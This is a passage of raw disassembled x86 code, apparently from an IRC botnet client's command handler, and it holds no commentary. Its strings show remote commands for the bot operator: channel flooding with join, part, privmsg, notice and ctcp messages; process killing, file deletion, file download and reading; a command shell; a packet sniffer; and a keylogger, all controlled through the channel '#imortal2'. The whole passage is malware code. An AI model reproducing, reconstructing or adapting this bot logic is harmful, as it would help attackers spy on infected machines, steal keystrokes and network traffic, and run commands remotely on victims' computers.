push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
push offset byte_42C60E
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPartSS ; "part %s %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 24h
call sub_41ECDE
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 10h
call sub_41ECDE
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60E
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPartSS ; "part %s %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 24h
call sub_41ECDE
cdq
mov ecx, 0C8h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60E
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPartSS ; "part %s %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_405B36: ; CODE XREF: sub_40274D+32C8�j
; sub_40274D+32D2�j
push [ebp+4Ch+var_8]
push offset dword_42E70C
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405BC6
cmp [ebp+esi+4Ch+var_9C], ebx
jz short loc_405BC6
call ds:dword_42B038 ; GetTickCount
push eax
call sub_41ECD4
pop ecx
call sub_41ECDE
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41ECDE
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41ECDE
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41ECDE
cdq
mov ecx, 0F423Fh
idiv ecx
push edx
call sub_41ECDE
cdq
mov ecx, 0F423Fh
idiv ecx
lea eax, [ebp+4Ch+var_2D0]
push edx
push [ebp+esi+4Ch+var_9C]
push offset dword_42E6E4
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 24h
loc_405BC6: ; CODE XREF: sub_40274D+33FA�j
; sub_40274D+3400�j
push [ebp+4Ch+var_8]
push offset aNick_0 ; "nick"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_405CC0
mov eax, [ebp+esi+4Ch+var_9C]
cmp eax, ebx
jz loc_405CC0
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
lea eax, [ebp+4Ch+var_4C4]
push eax
call sub_41A293
lea eax, [ebp+4Ch+var_4C4]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 24h
call sub_41ECDE
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+4Ch+var_4C4]
push eax
call sub_41A293
lea eax, [ebp+4Ch+var_4C4]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
call sub_41ECDE
cdq
mov ecx, 1F4h
idiv ecx
push edx
call edi ; Sleep
lea eax, [ebp+4Ch+var_4C4]
push eax
call sub_41A293
lea eax, [ebp+4Ch+var_4C4]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_405CC0: ; CODE XREF: sub_40274D+348A�j
; sub_40274D+3496�j
push [ebp+4Ch+var_8]
push offset aChgnick ; "chgnick"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_405D06
lea eax, [ebp+4Ch+var_17D8]
push eax
call sub_41A293
lea eax, [ebp+4Ch+var_17D8]
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aNickS_0 ; "NICK %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_405D06: ; CODE XREF: sub_40274D+3584�j
push [ebp+4Ch+var_8]
push offset aMsg ; "msg"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_405DE3
cmp [ebp+esi+4Ch+var_9C], ebx
jz loc_405DE3
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 24h
call sub_41ECDE
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
call sub_41ECDE
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPrivmsgSS ; "privmsg %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_405DE3: ; CODE XREF: sub_40274D+35CA�j
; sub_40274D+35D4�j
push [ebp+4Ch+var_8]
push offset aNotice_0 ; "notice"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_405EC0
cmp [ebp+esi+4Ch+var_9C], ebx
jz loc_405EC0
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 24h
call sub_41ECDE
cdq
mov ecx, 3E8h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
call sub_41ECDE
cdq
mov ecx, 384h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_405EC0: ; CODE XREF: sub_40274D+36A7�j
; sub_40274D+36B1�j
push [ebp+4Ch+var_8]
push offset aCtcp ; "ctcp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_405FC2
cmp [ebp+esi+4Ch+var_9C], ebx
jz loc_405FC2
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E69C
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 20h
call sub_41ECDE
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E684
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 10h
call sub_41ECDE
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E66C
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 10h
call sub_41ECDE
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E66C
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 10h
loc_405FC2: ; CODE XREF: sub_40274D+3784�j
; sub_40274D+378E�j
push [ebp+4Ch+var_8]
push offset aMix ; "mix"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_4060D3
cmp [ebp+esi+4Ch+var_9C], ebx
jz loc_4060D3
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aJoinS ; "join %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E69C
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 20h
call sub_41ECDE
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
call sub_41ECDE
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aPrivmsgSS_0 ; "PRIVMSG %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
call sub_41ECDE
cdq
mov ecx, 514h
idiv ecx
push edx
call edi ; Sleep
push offset byte_42C60F
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aNoticeSS_1 ; "NOTICE %s :%s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_4060D3: ; CODE XREF: sub_40274D+3886�j
; sub_40274D+3890�j
push [ebp+4Ch+var_8]
push offset aRegister ; "register"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406113
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
jz short loc_406113
push eax
push [ebp+esi+4Ch+var_9C]
lea eax, [ebp+4Ch+var_2D0]
push offset aNickservRegist ; "nickserv register %s %s"
push eax
call sub_41E6A6
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41A24C
add esp, 14h
loc_406113: ; CODE XREF: sub_40274D+3997�j
; sub_40274D+399F�j
push [ebp+4Ch+var_8]
push offset aOff ; "off"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_406CD6
mov edi, offset dword_4DB58C
loc_40612F: ; CODE XREF: sub_40274D+3A01�j
cmp dword ptr [edi-4], 1
jnz short loc_406142
mov eax, [edi]
cmp eax, ebx
jbe short loc_406142
push eax
call ds:dword_444218 ; closesocket
loc_406142: ; CODE XREF: sub_40274D+39E6�j
; sub_40274D+39EC�j
add edi, 210h
cmp edi, offset dword_4E1CAC
jl short loc_40612F
cmp [ebp+4Ch+var_C], ebx
jnz loc_406CD6
push ebx
push [ebp+4Ch+var_4]
push offset unk_42E60C
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_40123B
add esp, 14h
jmp loc_406CD6
; ---------------------------------------------------------------------------
loc_406175: ; CODE XREF: sub_40274D+2F7A�j
mov edi, [ebp+4Ch+var_10]
push edi
push offset aNick_0 ; "nick"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409FBE
push edi
push offset aN ; "n"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409FBE
push edi
push offset aJoin ; "join"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409F95
push edi
push offset aJ ; "j"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409F95
push edi
push offset aPart_0 ; "part"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409F7B
push edi
push offset aPt ; "pt"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409F7B
push edi
push offset aRaw ; "raw"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409F45
push edi
push offset aR ; "r"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409F45
push edi
push offset aKillthread ; "killthread"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409E9F
push edi
push offset aK ; "k"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409E9F
push edi
push offset aC_quit ; "c_quit"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409DF1
push edi
push offset aC_q ; "c_q"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409DF1
push edi
push offset aC_rndnick ; "c_rndnick"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D7C
push edi
push offset aC_rn ; "c_rn"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D7C
push edi
push offset aPrefix ; "prefix"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D63
push edi
push offset aPr ; "pr"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D63
push edi
push offset aOpen ; "open"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D35
push edi
push offset aO ; "o"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D35
push edi
push offset aServer_1 ; "server"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D0C
push edi
push offset aSe ; "se"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409D0C
push edi
push offset aDns ; "dns"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409CA4
push edi
push offset aDn ; "dn"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409CA4
push edi
push offset aKillproc ; "killproc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409C74
push edi
push offset aKp ; "kp"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409C74
push edi
push offset aKill ; "kill"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409C18
push edi
push offset aKi ; "ki"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409C18
push edi
push offset aDelete ; "delete"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409BDD
push edi
push offset aDel ; "del"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409BDD
push edi
push offset aGet_0 ; "get"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409B06
push edi
push offset aGt ; "gt"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409B06
push edi
push offset aList ; "list"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409AEA
push edi
push offset aLi ; "li"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409AEA
push edi
push offset aVisit ; "visit"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409A00
push edi
push offset aV ; "v"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409A00
push edi
push offset aMirccmd ; "mirccmd"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40998D
push edi
push offset aMirc ; "mirc"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_40998D
push edi
push offset aCmd ; "cmd"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409937
push edi
push offset aCm ; "cm"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_409937
push edi
push offset aReadfile ; "readfile"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4098AF
push edi
push offset aRf ; "rf"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz loc_4098AF
push edi
push offset aPsniff ; "psniff"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_406608
push [ebp+4Ch+var_8]
push offset aOn ; "on"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_4065CE
push 20h
call sub_40B075
test eax, eax
pop ecx
jle short loc_406502
push offset dword_42E510
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406502: ; CODE XREF: sub_40274D+3DA9�j
mov eax, [ebp+4Ch+arg_4]
mov esi, [ebp+esi+4Ch+var_9C]
cmp esi, ebx
mov [ebp+4Ch+var_FF4], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_F6C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_F68], eax
jnz short loc_40653E
push offset byte_42B633
mov esi, offset aImortal2_1 ; "#imortal2"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_40653E
mov esi, [ebp+4Ch+var_9C]
loc_40653E: ; CODE XREF: sub_40274D+3DD6�j
; sub_40274D+3DEC�j
push esi
lea eax, [ebp+4Ch+var_FF0]
push 80h
push eax
call sub_41E6FE
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E4E0
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 20h
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_F70], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_FF4]
push eax
push offset word_414ECA
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_F70]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4065C1
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42E4A4
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4065B9: ; CODE XREF: sub_40274D+3E7A�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4065C1: ; CODE XREF: sub_40274D+3E59�j
cmp [ebp+4Ch+var_F64], ebx
jz short loc_4065B9
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_4065CE: ; CODE XREF: sub_40274D+3D99�j
push [ebp+4Ch+var_8]
push offset aOff ; "off"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 20h
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_4065FE
push eax
push offset dword_42E468
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4065FE: ; CODE XREF: sub_40274D+3EA4�j
push offset dword_42E43C
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406608: ; CODE XREF: sub_40274D+3D82�j
push edi
push offset aSniffer ; "sniffer"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_406750
push [ebp+4Ch+var_8]
push offset aOn ; "on"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_406716
push 21h
call sub_40B075
test eax, eax
pop ecx
jle short loc_40664A
push offset unk_42E414
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_40664A: ; CODE XREF: sub_40274D+3EF1�j
mov eax, [ebp+4Ch+arg_4]
mov esi, [ebp+esi+4Ch+var_9C]
cmp esi, ebx
mov [ebp+4Ch+var_ECC], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_E44], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_E40], eax
jnz short loc_406686
push offset byte_42B633
mov esi, offset aImortal2_1 ; "#imortal2"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406686
mov esi, [ebp+4Ch+var_9C]
loc_406686: ; CODE XREF: sub_40274D+3F1E�j
; sub_40274D+3F34�j
push esi
lea eax, [ebp+4Ch+var_EC8]
push 80h
push eax
call sub_41E6FE
lea eax, [ebp+4Ch+var_2D0]
push offset unk_42E3E4
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 21h
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_E48], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_ECC]
push eax
push offset word_41549E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_E48]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_406709
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset unk_42E3A8
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_406701: ; CODE XREF: sub_40274D+3FC2�j
push 32h
call ds:dword_42B014 ; Sleep
loc_406709: ; CODE XREF: sub_40274D+3FA1�j
cmp [ebp+4Ch+var_E3C], ebx
jz short loc_406701
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_406716: ; CODE XREF: sub_40274D+3EE1�j
push [ebp+4Ch+var_8]
push offset aOff ; "off"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 21h
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_406746
push eax
push offset unk_42E368
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_406746: ; CODE XREF: sub_40274D+3FEC�j
push offset unk_42E334
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406750: ; CODE XREF: sub_40274D+3ECA�j
push edi
push offset aIdent ; "ident"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_406825
push [ebp+4Ch+var_8]
push offset aOn ; "on"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4067EB
push 2
call sub_40B075
test eax, eax
pop ecx
lea eax, [ebp+4Ch+var_2D0]
jle short loc_406794
push offset dword_42E30C
jmp loc_4078CF
; ---------------------------------------------------------------------------
loc_406794: ; CODE XREF: sub_40274D+403B�j
push offset dword_42E2E0
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 2
push eax
call sub_40AE85
add esp, 14h
mov esi, eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
push esi
push offset loc_41321D
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
imul esi, 234h
cmp eax, ebx
mov ds:dword_4444FC[esi], eax
jnz loc_40698D
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42E2AC
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_4067EB: ; CODE XREF: sub_40274D+4029�j
push [ebp+4Ch+var_8]
push offset aOff ; "off"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 2
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_40681B
push eax
push offset dword_42E274
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_40681B: ; CODE XREF: sub_40274D+40C1�j
push offset dword_42E254
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_406825: ; CODE XREF: sub_40274D+4012�j
push edi
push offset aKeylog ; "keylog"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_4069C6
push [ebp+4Ch+var_8]
push offset aOn ; "on"
call sub_41E990
test eax, eax
pop ecx
pop ecx
mov edi, offset aFile ; "file"
jz short loc_40689B
push [ebp+4Ch+var_8]
push edi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jz short loc_40689B
push [ebp+4Ch+var_8]
push offset aOff ; "off"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_40698D
push ebx
push 23h
call sub_40B028
cmp eax, ebx
pop ecx
pop ecx
jle short loc_406891
push eax
push offset dword_42E208
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_406891: ; CODE XREF: sub_40274D+4137�j
push offset dword_42E1DC
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_40689B: ; CODE XREF: sub_40274D+4103�j
; sub_40274D+4112�j
push 23h
call sub_40B075
test eax, eax
pop ecx
jle short loc_4068B1
push offset dword_42E1BC
jmp loc_4078C9
; ---------------------------------------------------------------------------
loc_4068B1: ; CODE XREF: sub_40274D+4158�j
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_C64], eax
mov eax, [ebp+4Ch+var_4]
push edi
mov [ebp+4Ch+var_BDC], eax
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_4068DE
mov [ebp+4Ch+var_BD8], 1
jmp short loc_4068E7
; ---------------------------------------------------------------------------
loc_4068DE: ; CODE XREF: sub_40274D+4183�j
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_BD8], eax
loc_4068E7: ; CODE XREF: sub_40274D+418F�j
mov esi, [ebp+esi+4Ch+var_9C]
cmp esi, ebx
jnz short loc_406908
push offset byte_42B633
mov esi, offset aImortal2_2 ; "#imortal2"
push esi
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406908
mov esi, [ebp+4Ch+var_9C]
loc_406908: ; CODE XREF: sub_40274D+41A0�j
; sub_40274D+41B6�j
push esi
lea eax, [ebp+4Ch+var_C5C]
push 80h
push eax
call sub_41E6FE
lea eax, [ebp+4Ch+var_2D0]
push offset dword_42E198
push eax
call sub_41E6A6
push ebx
lea eax, [ebp+4Ch+var_2D0]
push 23h
push eax
call sub_40AE85
add esp, 20h
mov [ebp+4Ch+var_C60], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_C64]
push eax
push offset aUnlMb_0 ; "Ul$ŒìÜ\b"
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_C60]
imul ecx, 234h
cmp eax, ebx
mov ds:dword_4444FC[ecx], eax
jnz short loc_4069BC
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset dword_42E15C
loc_40697E: ; CODE XREF: sub_40274D+1F36�j
; sub_40274D+2CAA�j ...
lea eax, [ebp+4Ch+var_2D0]
push eax
call sub_41E6A6
loc_40698A: ; CODE XREF: sub_40274D+2C9F�j
; sub_40274D+52AD�j
add esp, 0Ch
loc_40698D: ; CODE XREF: sub_40274D+1F4B�j
; sub_40274D+2CDA�j ...
cmp [ebp+4Ch+var_C], ebx
jnz loc_408D10
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+var_2D0]
push eax
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
loc_4069A7: ; CODE XREF: sub_40274D+628B�j
call sub_40123B
add esp, 14h
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_4069B4: ; CODE XREF: sub_40274D+4275�j
push 32h
call ds:dword_42B014 ; Sleep
loc_4069BC: ; CODE XREF: sub_40274D+4223�j
cmp [ebp+4Ch+var_BD4], ebx
jz short loc_4069B4
jmp short loc_40698D
; ---------------------------------------------------------------------------
loc_4069C6: ; CODE XREF: sub_40274D+40E7�j
push edi
push offset aNet ; "net"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz loc_406C82
cmp ds:dword_444274, ebx
jz short loc_4069F5
cmp ds:dword_44429C, ebx
jz short loc_4069F5
push offset unk_42E120
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_4069F5: ; CODE XREF: sub_40274D+4294�j
; sub_40274D+429C�j
cmp [ebp+4Ch+var_18], ebx
jz loc_406C4D
mov edi, [ebp+esi+4Ch+var_9C]
cmp edi, ebx
mov [ebp+4Ch+arg_0], ebx
jz short loc_406A17
push edi
push [ebp+4Ch+var_18]
call sub_41F090
pop ecx
pop ecx
mov [ebp+4Ch+arg_0], eax
loc_406A17: ; CODE XREF: sub_40274D+42BA�j
push [ebp+4Ch+var_8]
push offset aStart ; "start"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406A81
cmp edi, ebx
jz short loc_406A52
push [ebp+4Ch+arg_0]
push 3
loc_406A33: ; CODE XREF: sub_40274D+434C�j
; sub_40274D+4366�j ...
call sub_41BF46
push eax
lea eax, [ebp+4Ch+var_2D0]
push offset aS ; "%s"
push eax
call sub_41E6A6
add esp, 14h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_406A52: ; CODE XREF: sub_40274D+42DF�j
push [ebp+4Ch+var_4]
push [ebp+4Ch+var_9C]
push [ebp+4Ch+arg_4]
call sub_41B681
add esp, 0Ch
test eax, eax
lea eax, [ebp+4Ch+var_2D0]
jz short loc_406A77
push offset unk_42E0F4
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406A77: ; CODE XREF: sub_40274D+431E�j
push offset unk_42E0D4
jmp loc_406C45
; ---------------------------------------------------------------------------
loc_406A81: ; CODE XREF: sub_40274D+42DB�j
push [ebp+4Ch+var_8]
push offset aStop ; "stop"
call sub_41E990
test eax, eax
pop ecx
pop ecx
jnz short loc_406A9B
